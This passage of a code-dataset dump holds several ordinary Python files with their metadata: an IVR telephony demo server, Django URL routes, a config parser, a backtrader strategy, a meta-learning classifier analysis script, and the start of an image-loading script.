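reg = r'\d+'
as_text = "r'" + reg + "'"         # just the 6-character string  r'\d+'
pattern = re.compile(reg)          # what the script actually searches with
print(as_text)                     # -> r'\d+'
print(pattern.search('abc 123').group())   # -> 123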
Here are just a few', lang=SpeakLanguages.en_AU)\n builder.add(speak).add(wait1)\n\n speak = Speak(lang=SpeakLanguages.fr_FR, text='Je peux parler français')\n builder.add(speak).add(wait1)\n\n speak = Speak(lang=SpeakLanguages.de_DE, text='Auch deutsch')\n builder.add(speak).add(wait1)\n\n speak = Speak(lang=SpeakLanguages.ja_JP, text='そして日本人ですら')\n builder.add(speak).add(wait1)\n\n speak = Speak(text=\"You can see our documentation for a full list of supported languages and voices for them. We'll take you back to the menu for now.\")\n wait2 = Wait(2)\n\n builder.add(speak).add(wait2)\n return str(builder)\n\n\ndef step2():\n builder = Builder()\n speak = Speak(text='You will now be joined to an echo line.')\n echo = Echo()\n builder.add(speak).add(echo)\n return str(builder)\n\n\ndef step3():\n builder = Builder()\n speak = Speak('You will be entered into a conference call now. You can initiate more calls to join participants or hangup to leave')\n conf = Conference(room='SDKTestConference')\n builder.add(speak).add(conf)\n return str(builder)\n\n\nclass Handler(BaseHTTPRequestHandler):\n def _set_headers(self):\n self.send_response(200)\n self.send_header(\"Content-type\", \"text/xml\")\n self.end_headers()\n\n def do_GET(self):\n self._set_headers()\n if self.path == '/':\n self.wfile.write(intro('http://localhost').encode('utf-8'))\n elif self.path == '/step1.xml':\n self.wfile.write(step1().encode('utf-8'))\n elif self.path == '/step2.xml':\n self.wfile.write(step2().encode('utf-8'))\n elif self.path == '/step3.xml':\n self.wfile.write(step3().encode('utf-8'))\n\n\nport = 8080\nhandler = Handler\n\nhttpd = HTTPServer((\"\", port), handler)\nhttpd.serve_forever()\n\n", "sub_path": "examples/ivr_demo_example.py", "file_name": "ivr_demo_example.py", "file_ext": "py", "file_size_in_byte": 3217, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "apidaze.script.Builder", "line_number": 7, "usage_type": "call"}, {"api_name": "apidaze.script.Ringback", "line_number": 8, "usage_type": "call"}, {"api_name": "apidaze.script.Wait", "line_number": 9, "usage_type": "call"}, {"api_name": "apidaze.script.Answer", "line_number": 10, "usage_type": "call"}, {"api_name": "apidaze.script.Record", "line_number": 11, "usage_type": "call"}, {"api_name": "apidaze.script.Wait", "line_number": 12, "usage_type": "call"}, {"api_name": "apidaze.script.Playback", "line_number": 13, "usage_type": "call"}, {"api_name": "apidaze.script.Speak", "line_number": 14, "usage_type": "call"}, {"api_name": "apidaze.script.Speak", "line_number": 19, "usage_type": "call"}, {"api_name": "apidaze.script.Bind", "line_number": 20, "usage_type": "call"}, {"api_name": "apidaze.script.Bind", "line_number": 21, "usage_type": "call"}, {"api_name": "apidaze.script.Bind", "line_number": 22, "usage_type": "call"}, {"api_name": "apidaze.script.Builder", "line_number": 31, "usage_type": "call"}, {"api_name": "apidaze.script.Speak", "line_number": 32, "usage_type": "call"}, {"api_name": "apidaze.script.Wait", "line_number": 33, "usage_type": "call"}, {"api_name": "apidaze.script.Speak", "line_number": 37, "usage_type": "call"}, {"api_name": "apidaze.script.SpeakLanguages.en_AU", "line_number": 37, "usage_type": "attribute"}, {"api_name": "apidaze.script.SpeakLanguages", "line_number": 37, "usage_type": "name"}, {"api_name": "apidaze.script.Speak", "line_number": 40, "usage_type": "call"}, {"api_name": "apidaze.script.SpeakLanguages.fr_FR", "line_number": 40, 
"usage_type": "attribute"}, {"api_name": "apidaze.script.SpeakLanguages", "line_number": 40, "usage_type": "name"}, {"api_name": "apidaze.script.Speak", "line_number": 43, "usage_type": "call"}, {"api_name": "apidaze.script.SpeakLanguages.de_DE", "line_number": 43, "usage_type": "attribute"}, {"api_name": "apidaze.script.SpeakLanguages", "line_number": 43, "usage_type": "name"}, {"api_name": "apidaze.script.Speak", "line_number": 46, "usage_type": "call"}, {"api_name": "apidaze.script.SpeakLanguages.ja_JP", "line_number": 46, "usage_type": "attribute"}, {"api_name": "apidaze.script.SpeakLanguages", "line_number": 46, "usage_type": "name"}, {"api_name": "apidaze.script.Speak", "line_number": 49, "usage_type": "call"}, {"api_name": "apidaze.script.Wait", "line_number": 50, "usage_type": "call"}, {"api_name": "apidaze.script.Builder", "line_number": 57, "usage_type": "call"}, {"api_name": "apidaze.script.Speak", "line_number": 58, "usage_type": "call"}, {"api_name": "apidaze.script.Echo", "line_number": 59, "usage_type": "call"}, {"api_name": "apidaze.script.Builder", "line_number": 65, "usage_type": "call"}, {"api_name": "apidaze.script.Speak", "line_number": 66, "usage_type": "call"}, {"api_name": "apidaze.script.Conference", "line_number": 67, "usage_type": "call"}, {"api_name": "http.server.BaseHTTPRequestHandler", "line_number": 72, "usage_type": "name"}, {"api_name": "http.server.HTTPServer", "line_number": 93, "usage_type": "call"}]} +{"seq_id": "111933488", "text": "from django.conf.urls import url\n# Import the views file from root dir (.)\nfrom . import views\n\nurlpatterns = [\n url(r'^post_list/', views.post_list, name='post_list'),\n # The URL should contain the word post and /\n # The URL will then transfer a pk variable to the view, pk = primary key\n # The pk variable can only be a number between [0-9] with one or more digits (+)\n url(r'^post/(?P[0-9]+)/$', views.post_detail, name='post_detail'),\n url(r'^post/new/$', views.post_new, name='post_new'),\n url(r'^post/(?P[0-9]+)/edit/$', views.post_edit, name='post_edit'),\n # Add about.html view URL\n url(r'^about', views.about, name='about'),\n # Add projects.html view URL\n url(r'^projects', views.projects, name='projects'),\n url(r'^$', views.landing_page, name='landing_page'),\n]\n", "sub_path": "blog/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 793, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.conf.urls.url", "line_number": 6, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 12, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 14, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 16, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "646687639", "text": "import sys\nimport os\nimport json\n\n\nclass ConfigException(Exception):\n def __init__(self, msg):\n super(ConfigException, self).__init__(\"Config exception: %s\" % (msg))\n\n\nclass Config:\n instance = None\n\n def parse_config(config_file=None):\n if not Config.instance:\n Config.instance = Config(config_file)\n\n return Config.instance\n\n def __init__(self, args):\n if args.config:\n config = args.config\n else:\n config_file = \"youtube-podcaster.json\"\n\n 
if sys.platform == \"linux\" and not hasattr(sys, \"real_prefix\"):\n config = \"/etc/%s\" % (config_file)\n else:\n config = \"%s/etc/%s\" % (sys.prefix, config_file)\n\n if not os.path.isfile(config):\n raise ConfigException(\"%s not found\" % (config))\n\n try:\n config = json.load(open(config))\n except json.decoder.JSONDecodeError as e:\n raise ConfigException(\"%s is not valid json: %s\" % (\n config, str(e)))\n\n try:\n self.server = config[\"server\"]\n self.youtube = config[\"youtube\"]\n self.podcasts = config[\"podcasts\"]\n self.downloads = config[\"downloads\"]\n except KeyError as e:\n raise ConfigException(\"Missing %s-section in %s\" % (\n str(e), config))\n\n for arg, value in vars(args).items():\n if not value:\n continue\n\n if arg == \"interface\":\n self.server[\"interface\"] = value\n elif arg == \"port\":\n self.server[\"port\"] = value\n elif arg == \"apikey\":\n self.youtube[\"api-key\"] = value\n\n def get_server_address(self):\n interface = str(self.server[\"interface\"])\n port = int(self.server[\"port\"])\n return interface, port\n\n# vim: set ts=8 sw=4 tw=0 et :\n", "sub_path": "youtube_podcaster/config.py", "file_name": "config.py", "file_ext": "py", "file_size_in_byte": 1931, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "sys.platform", "line_number": 26, "usage_type": "attribute"}, {"api_name": "sys.prefix", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 35, "usage_type": "call"}, {"api_name": "json.decoder", "line_number": 36, "usage_type": "attribute"}]} +{"seq_id": "344852844", "text": "\nimport backtrader as bt\n\nfrom python.base_strategy import BaseStrategy\n\nclass AS002Strategy(BaseStrategy):\n\n params = (\n ('high_period', None),\n ('low_period', None),\n )\n\n def __init__(self): \n self.close = self.datas[0].close\n self.high = self.datas[0].high\n self.low = self.datas[0].low\n\n self.highest_high = bt.indicators.Highest(self.high, period=self.params.high_period, plot=False)\n self.lowest_low = bt.indicators.Lowest(self.low, period=self.params.low_period, plot=False)\n self.macd_hist = bt.indicators.MACDHisto(self.close, plot=False).histo\n \n self.order = None \n\n def next(self): \n\n # Check if an order is pending\n if self.order:\n return\n \n buy_condition = (self.macd_hist[0] > 0) and (self.close[0] > self.highest_high[-1])\n sell_condition = (self.macd_hist[0] < 0) or (self.close[0] < self.lowest_low[-1])\n\n # Check if we are in the market\n if not self.position:\n \n if buy_condition:\n self.order = self.buy()\n \n else: \n \n if sell_condition:\n self.order = self.sell() \n\n", "sub_path": "python/AS002.py", "file_name": "AS002.py", "file_ext": "py", "file_size_in_byte": 1309, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "python.base_strategy.BaseStrategy", "line_number": 6, "usage_type": "name"}, {"api_name": "backtrader.indicators.Highest", "line_number": 18, "usage_type": "call"}, {"api_name": "backtrader.indicators", "line_number": 18, "usage_type": "attribute"}, {"api_name": "backtrader.indicators.Lowest", "line_number": 19, "usage_type": "call"}, {"api_name": "backtrader.indicators", "line_number": 19, "usage_type": "attribute"}, {"api_name": "backtrader.indicators.MACDHisto", "line_number": 20, 
"usage_type": "call"}, {"api_name": "backtrader.indicators", "line_number": 20, "usage_type": "attribute"}]} +{"seq_id": "441220191", "text": "import os\nimport pandas as pd\nimport numpy as np\nimport json\n# import matplotlib.pyplot as plt\n\nfrom sklearn import svm, linear_model, discriminant_analysis, neighbors\nfrom sklearn import tree, naive_bayes, ensemble, neural_network, gaussian_process\nfrom sklearn.model_selection import cross_validate, KFold, train_test_split\nfrom sklearn import metrics\nfrom sklearn import preprocessing\n\nfrom scipy.io import arff as arff_io\nfrom pymfe.mfe import MFE\n\nfrom imblearn.over_sampling import SMOTE\nfrom imblearn.under_sampling import RandomUnderSampler\n\nfrom NoiseFiltersPy.HARF import HARF\nfrom NoiseFiltersPy.ENN import ENN\n\nimport constants\nfrom config import config\nfrom Default import Default\nfrom Random import Random\nfrom meta_db.db.DBHelper import DBHelper\n\nfrom R_Model import *\n# Importing utils from R\nfrom rpy2.robjects.packages import importr\nimport rpy2.robjects.packages as rpackages\nfrom rpy2.robjects.vectors import StrVector\nfrom rpy2.robjects.packages import SignatureTranslatedAnonymousPackage\n\n# For Formulae\nfrom rpy2.robjects import IntVector, Formula\n\n# For Pandas\nimport rpy2.robjects as ro\nfrom rpy2.robjects import pandas2ri\nfrom rpy2.robjects import numpy2ri\nfrom rpy2.robjects.conversion import localconverter\n\n# Getting R functions\nutils = importr(\"utils\")\nutils.chooseCRANmirror(ind=1)\n\n# Geting packages\npackages = (\"reshape2\", \"e1071\", \"kknn\", \"randomForest\", \"C50\", \"rpart\", \"neuralnet\")\nto_install = [pack for pack in packages if not rpackages.isinstalled(pack)]\nif to_install:\n utils.install_packages(StrVector(to_install))\n\ne1071 = importr(\"e1071\")\nkknn = importr(\"kknn\")\nrandomForest = importr(\"randomForest\")\nc50 = importr(\"C50\")\nrpart = importr(\"rpart\")\nneuralnet = importr(\"neuralnet\")\n\nRANDOM_STATE = 73\nnp.random.seed(RANDOM_STATE)\n\nSCORE = \"balanced_accuracy_mean\"\nSCORE_RAW = \"balanced_accuracy\"\n\ngrey_palette = ['rgb(208, 209, 211)',\n 'rgb(185, 191, 193)',\n 'rgb(137, 149, 147)',\n 'rgb(44, 54, 60)',\n 'rgb(3, 3, 3)'\n ]\n\npprocs = {\n \"RandomUnder\": RandomUnderSampler(random_state = RANDOM_STATE).fit_resample,\n \"SMOTE\": SMOTE(random_state = RANDOM_STATE).fit_resample,\n \"HARF\": HARF(seed = RANDOM_STATE),\n \"ENN\": ENN()\n}\ndef preprocessor(name, values, target):\n if name in [\"RandomUnder\", \"SMOTE\"]:\n return pprocs[name](values, target)\n else:\n filter = pprocs[name](values, target)\n return (filter.cleanData, filter.cleanClasses)\n\ndef real_scores(values, target):\n clf_models = {}\n svm_clf = svm.SVC(gamma = \"auto\").fit(values, target )\n clf_models[\"svm\"] = svm_clf # Actually not needed, the cv does the training again\n lg_clf = linear_model.LogisticRegression(random_state = RANDOM_STATE, solver = 'lbfgs').fit(values, target )\n clf_models[\"logistic_regression\"] = lg_clf\n lineardisc_clf = discriminant_analysis.LinearDiscriminantAnalysis().fit(values, target )\n clf_models[\"linear_discriminant\"] = lineardisc_clf\n neigh_clf = neighbors.KNeighborsClassifier().fit(values, target)\n clf_models[\"kneighbors\"] = neigh_clf\n dectree_clf = tree.DecisionTreeClassifier(random_state = RANDOM_STATE).fit(values, target )\n clf_models[\"decision_tree\"] = dectree_clf\n gaussian_clf = naive_bayes.GaussianNB().fit(values, target )\n clf_models[\"gaussian_nb\"] = gaussian_clf\n random_forest_clf = 
ensemble.RandomForestClassifier(n_estimators = 100).fit(values, target )\n clf_models[\"random_forest\"] = random_forest_clf\n gradient_boost_clf = ensemble.GradientBoostingClassifier().fit(values, target )\n clf_models[\"gradient_boosting\"] = gradient_boost_clf\n results = {}\n for clf in clf_models.keys():\n cv_results = cross_validate(clf_models[clf], values, target, cv = 10, scoring = SCORE_RAW)\n results[\"None+{}\".format(clf)] = np.mean(cv_results[\"test_score\"])\n\n for pproc in pprocs.keys():\n try:\n new_values, new_target = preprocessor(pproc, values, target)\n except:\n for clf in clf_models.keys():\n results[\"{}+{}\".format(pproc, clf)] = 0\n continue\n\n for clf in clf_models.keys():\n try:\n cv_results = cross_validate(clf_models[clf], new_values, new_target, cv = 10, scoring = SCORE_RAW)\n except ValueError:\n cv_results = cross_validate(clf_models[clf], values, target, cv = 10, scoring = SCORE_RAW)\n results[\"{}+{}\".format(pproc, clf)] = np.mean(cv_results[\"test_score\"])\n return results\n\ntranslator = {\n \"gaussian_nb\": \"GNB\",\n \"random_forest\": \"RF\",\n \"randomForest\": \"RF\",\n \"random\": \"Random\",\n \"default\": \"Default\"\n}\n\ndb = DBHelper()\nmfe = MFE()\nle = preprocessing.LabelEncoder()\n\n\ndef deal_dataset(name):\n data = arff_io.loadarff(config[\"dataset\"][\"folder\"] + name + \".arff\")\n data = pd.DataFrame(data[0])\n target = data[\"class\"].values\n if target.dtype == np.object:\n le.fit(target)\n target = le.transform(target)\n values = data.drop(\"class\", axis = 1)\n # Check if any is a string, some classifiers only deals with numeric data\n for dtype, key in zip(values.dtypes, values.keys()):\n if dtype == np.object:\n le.fit(values[key].values)\n values[key] = le.transform(values[key].values)\n values = values.values\n return values, target\n\ndef calculate_metafeature(name, values, target):\n mfe.fit(values, target)\n try:\n ft = mfe.extract(supress_warnings = True)\n except AttributeError:\n mfe.fit(values.astype(float), target)\n ft = mfe.extract(supress_warnings = True)\n labels = np.array(ft[0])\n results = np.array(ft[1])\n nan_columns = np.isnan(results)\n not_nan = np.invert(nan_columns)\n # Adding name to the list\n labels = [\"name\"] + labels[not_nan].tolist()\n results = [name] + results[not_nan].tolist()\n for indx, result in enumerate(results):\n if isinstance(result, complex):\n results[indx] = result.real\n cols = []\n for type in labels:\n if type == \"int\":\n type = \"intt\"\n cols.append(type.replace(\".\", \"_\"))\n results = np.array(results).reshape((1, len(results)))\n results = pd.DataFrame(results, columns = cols)\n return results\n\nmetadata = pd.DataFrame(db.get_all_metadata(), columns = db.metadata_columns()).drop(\"id\", axis = 1)\nmodels = pd.DataFrame(db.get_all_models(), columns = db.models_columns()).drop(\"id\", axis = 1)\ncombinations = pd.DataFrame(db.get_all_combinations(), columns = db.combinations_columns())\npreperformance = pd.DataFrame(db.get_all_preperformance(), columns = db.preperformance_columns()).drop(\"id\", axis = 1)\n# Not null preperformance\npreperformance = preperformance[~preperformance.isnull().any(axis = 1)]\npreperformance = pd.merge(preperformance, combinations, left_on = \"combination_id\", right_on = \"id\").drop([\"combination_id\", \"id\", \"num_preprocesses\"], axis = 1)\n\nmodels = models.rename(columns = {\"model\": \"classifier\"})\nmodels[\"preprocesses\"] = \"None\"\nscores = pd.concat([models, preperformance], sort = False)\nscores = scores[scores.classifier != 
\"neural_network\"]\nmodels = models[models.classifier != \"neural_network\"]\n\nmetadata_means = {feature: np.mean(metadata[feature]) for feature in metadata.columns if feature != \"name\"}\nmetadata.fillna(value = metadata_means, inplace = True)\n\ndata = pd.merge(metadata, scores, on = \"name\")\ndata = data[data.preprocesses.isin(constants.PRE_PROCESSES + [\"None\"]) & data.classifier.isin(constants.CLASSIFIERS)]\n\nmeta_means = {feature: np.mean(metadata[feature]) for feature in metadata.columns if feature != \"name\"}\n\nif not os.path.exists(\"analysis/plots\"):\n os.makedirs(\"analysis/plots\")\nif not os.path.exists(\"analysis/plots/base_analysis\"):\n os.makedirs(\"analysis/plots/base_analysis\")\n\nmean_scores = []\nstd_scores = []\nfor score in constants.CLASSIFIERS_SCORES:\n mean_scores.append(score + \"_mean\")\n std_scores.append(score + \"_std\")\n\nreg_models = {}\nreg_models[\"ann\"] = lambda: R_Model(neuralnet.neuralnet)\nreg_models[\"cart\"] = lambda: R_Model(rpart.rpart)\nreg_models[\"randomForest\"] = lambda: R_Model(randomForest.randomForest)\nreg_models[\"svm\"] = lambda: SVR()\nreg_models[\"dwnn\"] = lambda: KNN()\nreg_models[\"random\"] = lambda: Random(random_seed = RANDOM_STATE)\nreg_models[\"default\"] = lambda: Default()\n\n# Function to get only datasets with all results (combinations)\ndef filter_dataset(database):\n datasets_filtered = []\n for dataset in database.name.unique():\n split = database[database.name == dataset]\n keep = True\n for clf in constants.CLASSIFIERS:\n for pp in constants.PRE_PROCESSES + ['None']:\n if len(split[(split.classifier == clf) & (split.preprocesses == pp)]) < 1:\n keep = False\n if keep:\n datasets_filtered.append(dataset)\n return datasets_filtered\n\ndatasets = pd.Series(filter_dataset(data))\n\nresults = {}\n\nresults[\"pp_wins\"] = {}\nresults[\"clf_wins\"] = {}\nresults[\"wins\"] = {}\n\nnum_datasets = {}\n\nTURNS = 5\n\nregressor_type = \"randomForest\"\nresults[\"pp_wins\"][regressor_type] = [0] * TURNS\nresults[\"clf_wins\"][regressor_type] = [0] * TURNS\nresults[\"wins\"][regressor_type] = [0] * TURNS\n\nnum_datasets[regressor_type] = [0] * TURNS\n\ntrain_dt, test_dt = train_test_split(datasets, test_size = 0.1, random_state = RANDOM_STATE, shuffle = True)\ntargets = data[data.name.isin(train_dt)]\ntrained_reg = {}\n\nfor clf in constants.CLASSIFIERS:\n for preprocess in (constants.PRE_PROCESSES + ['None']):\n trained_reg[\"{}+{}\".format(preprocess, clf)] = reg_models[regressor_type]()\n target = targets.query(\"classifier == '{}' and preprocesses == '{}'\".format(clf, preprocess))\n meta_target = target.drop([\"name\", \"classifier\", \"preprocesses\", *mean_scores, *std_scores], axis = 1)\n label_target = target[SCORE].values\n trained_reg[\"{}+{}\".format(preprocess, clf)].fit(meta_target, label_target)\n\ntests = data[data.name.isin(test_dt)]\nfor test_dataset in tests.name.unique():\n print(test_dataset)\n dt_values, dt_target = deal_dataset(test_dataset)\n\n dataset_info = tests[tests.name == test_dataset]\n meta_data = dataset_info.drop(\n [\"name\", \"classifier\", \"preprocesses\", *mean_scores, *std_scores],\n axis = 1\n ).iloc[[0]]\n\n for turn in range(TURNS):\n num_datasets[regressor_type][turn] += 1\n print(\"MAKING TURNS\")\n reg_results = {}\n for model in trained_reg:\n reg_results[model] = trained_reg[model].predict(meta_data)\n max_predicted = max(reg_results.keys(), key = (lambda key: reg_results[key]))\n pp_pred, clf_pred = max_predicted.split(\"+\")\n if turn == 0:\n print(\"TURN 0\")\n 
true_max = dataset_info[dataset_info[SCORE] == dataset_info[SCORE].max()]\n pp_maxes = [entry.preprocesses for indx, entry in true_max.iterrows()]\n clf_maxes = [entry.classifier for indx, entry in true_max.iterrows()]\n score_pred = dataset_info[(dataset_info.preprocesses == pp_pred) & (dataset_info.classifier == clf_pred)][SCORE]\n results[\"wins\"][regressor_type][turn] += 1 if ((pp_pred in pp_maxes) and (clf_pred in clf_maxes)) else 0\n else:\n print(\"RECURSION TURN\")\n true_max = max(clf_scores, key = (lambda pp_clf: clf_scores[pp_clf]))\n max_comb_value = clf_scores[true_max]\n true_maxes = [comb for comb in clf_scores if clf_scores[comb] == max_comb_value]\n pp_maxes = []; clf_maxes = []\n for max_v in true_maxes:\n pp, clf = max_v.split(\"+\")\n pp_maxes.append(pp); clf_maxes.append(clf)\n results[\"wins\"][regressor_type][turn] += 1 if (max_predicted in true_maxes) else 0\n\n results[\"pp_wins\"][regressor_type][turn] += 1 if (pp_pred in pp_maxes) else 0\n results[\"clf_wins\"][regressor_type][turn] += 1 if (clf_pred in clf_maxes) else 0\n\n if (pp_pred == \"None\") or not (pp_pred in pp_maxes):\n print(\"END PP\")\n break\n else:\n try:\n dt_values, dt_target = preprocessor(pp_pred, dt_values, dt_target)\n meta_data = calculate_metafeature(test_dataset, dt_values, dt_target)\n except:\n break\n print(\"HERE!\")\n meta_results = {}\n for indx, col in enumerate(dataset_info.columns.drop([\"name\", \"classifier\", \"preprocesses\", *mean_scores, *std_scores])):\n if col not in meta_data.columns:\n meta_results[col] = meta_means[col]\n else:\n meta_results[col] = float(meta_data[col])\n meta_data = pd.DataFrame.from_dict([meta_results])\n clf_scores = real_scores(dt_values, dt_target)\n print(\"END TURN\")\n print(\"END END\")\n\nprint(results)\nprint(num_datasets)\nwith open(\"analysis/plots/recursion/\" + SCORE + \".rf.{}.json\".format(RANDOM_STATE), \"w\") as fd:\n json.dump(results, fd, indent = 4)\nwith open(\"analysis/plots/recursion/\" + SCORE + \"__numdatasets.rf.{}.json\".format(RANDOM_STATE), \"w\") as fd:\n json.dump(num_datasets, fd, indent = 4)\n", "sub_path": "analysis/recursion_analysis_random_forest.py", "file_name": "recursion_analysis_random_forest.py", "file_ext": "py", "file_size_in_byte": 13206, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "rpy2.robjects.packages.importr", "line_number": 45, "usage_type": "call"}, {"api_name": "rpy2.robjects.packages.isinstalled", "line_number": 50, "usage_type": "call"}, {"api_name": "rpy2.robjects.packages", "line_number": 50, "usage_type": "name"}, {"api_name": "rpy2.robjects.vectors.StrVector", "line_number": 52, "usage_type": "call"}, {"api_name": "rpy2.robjects.packages.importr", "line_number": 54, "usage_type": "call"}, {"api_name": "rpy2.robjects.packages.importr", "line_number": 55, "usage_type": "call"}, {"api_name": "rpy2.robjects.packages.importr", "line_number": 56, "usage_type": "call"}, {"api_name": "rpy2.robjects.packages.importr", "line_number": 57, "usage_type": "call"}, {"api_name": "rpy2.robjects.packages.importr", "line_number": 58, "usage_type": "call"}, {"api_name": "rpy2.robjects.packages.importr", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 62, "usage_type": "attribute"}, {"api_name": "imblearn.under_sampling.RandomUnderSampler", "line_number": 75, "usage_type": "call"}, {"api_name": 
"imblearn.over_sampling.SMOTE", "line_number": 76, "usage_type": "call"}, {"api_name": "NoiseFiltersPy.HARF.HARF", "line_number": 77, "usage_type": "call"}, {"api_name": "NoiseFiltersPy.ENN.ENN", "line_number": 78, "usage_type": "call"}, {"api_name": "sklearn.svm.SVC", "line_number": 89, "usage_type": "call"}, {"api_name": "sklearn.svm", "line_number": 89, "usage_type": "name"}, {"api_name": "sklearn.linear_model.LogisticRegression", "line_number": 91, "usage_type": "call"}, {"api_name": "sklearn.linear_model", "line_number": 91, "usage_type": "name"}, {"api_name": "sklearn.discriminant_analysis.LinearDiscriminantAnalysis", "line_number": 93, "usage_type": "call"}, {"api_name": "sklearn.discriminant_analysis", "line_number": 93, "usage_type": "name"}, {"api_name": "sklearn.neighbors.KNeighborsClassifier", "line_number": 95, "usage_type": "call"}, {"api_name": "sklearn.neighbors", "line_number": 95, "usage_type": "name"}, {"api_name": "sklearn.tree.DecisionTreeClassifier", "line_number": 97, "usage_type": "call"}, {"api_name": "sklearn.tree", "line_number": 97, "usage_type": "name"}, {"api_name": "sklearn.naive_bayes.GaussianNB", "line_number": 99, "usage_type": "call"}, {"api_name": "sklearn.naive_bayes", "line_number": 99, "usage_type": "name"}, {"api_name": "sklearn.ensemble.RandomForestClassifier", "line_number": 101, "usage_type": "call"}, {"api_name": "sklearn.ensemble", "line_number": 101, "usage_type": "name"}, {"api_name": "sklearn.ensemble.GradientBoostingClassifier", "line_number": 103, "usage_type": "call"}, {"api_name": "sklearn.ensemble", "line_number": 103, "usage_type": "name"}, {"api_name": "sklearn.model_selection.cross_validate", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 108, "usage_type": "call"}, {"api_name": "sklearn.model_selection.cross_validate", "line_number": 120, "usage_type": "call"}, {"api_name": "sklearn.model_selection.cross_validate", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 123, "usage_type": "call"}, {"api_name": "meta_db.db.DBHelper.DBHelper", "line_number": 134, "usage_type": "call"}, {"api_name": "pymfe.mfe.MFE", "line_number": 135, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 136, "usage_type": "call"}, {"api_name": "sklearn.preprocessing", "line_number": 136, "usage_type": "name"}, {"api_name": "scipy.io.arff.loadarff", "line_number": 140, "usage_type": "call"}, {"api_name": "scipy.io.arff", "line_number": 140, "usage_type": "name"}, {"api_name": "config.config", "line_number": 140, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.object", "line_number": 143, "usage_type": "attribute"}, {"api_name": "numpy.object", "line_number": 149, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 162, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 164, "usage_type": "call"}, {"api_name": "numpy.invert", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 177, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 178, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 181, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 182, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 183, "usage_type": "call"}, {"api_name": "pandas.DataFrame", 
"line_number": 184, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 187, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 191, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 195, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 198, "usage_type": "call"}, {"api_name": "constants.PRE_PROCESSES", "line_number": 199, "usage_type": "attribute"}, {"api_name": "constants.CLASSIFIERS", "line_number": 199, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 201, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 203, "usage_type": "call"}, {"api_name": "os.path", "line_number": 203, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 204, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 205, "usage_type": "call"}, {"api_name": "os.path", "line_number": 205, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 206, "usage_type": "call"}, {"api_name": "constants.CLASSIFIERS_SCORES", "line_number": 210, "usage_type": "attribute"}, {"api_name": "Random.Random", "line_number": 220, "usage_type": "call"}, {"api_name": "Default.Default", "line_number": 221, "usage_type": "call"}, {"api_name": "constants.CLASSIFIERS", "line_number": 229, "usage_type": "attribute"}, {"api_name": "constants.PRE_PROCESSES", "line_number": 230, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 237, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 256, "usage_type": "call"}, {"api_name": "constants.CLASSIFIERS", "line_number": 260, "usage_type": "attribute"}, {"api_name": "constants.PRE_PROCESSES", "line_number": 261, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame.from_dict", "line_number": 324, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 324, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 332, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 334, "usage_type": "call"}]} +{"seq_id": "260542699", "text": "import numpy as np\r\nimport pandas as pd\r\nimport random\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\nget_ipython().run_line_magic('matplotlib', 'inline')\r\nimport skimage\r\nfrom numpy import matlib as mb\r\nimport imageio\r\nimport cv2\r\nimport imageio as iio\r\nfrom skimage import filters\r\nfrom skimage.color import rgb2gray # only needed for incorrectly saved images\r\nfrom skimage.measure import regionprops\r\nfrom scipy import ndimage\r\n\r\n# Load training images and labels\r\nx_train_list = np.load('train_images.npy', encoding='bytes')\r\ntrain_labels = pd.read_csv('train_labels.csv')\r\nx_test_list = np.load('test_images.npy', encoding='bytes')\r\n\r\nx_train = np.zeros((x_train_list[:,1].shape[0], x_train_list[0,1].shape[0]))\r\nx_test = np.zeros((x_test_list[:,1].shape[0], x_test_list[0,1].shape[0]))\r\n\r\n\r\n# Class information\r\nnb_classes = 31\r\nlook_up = {'0': 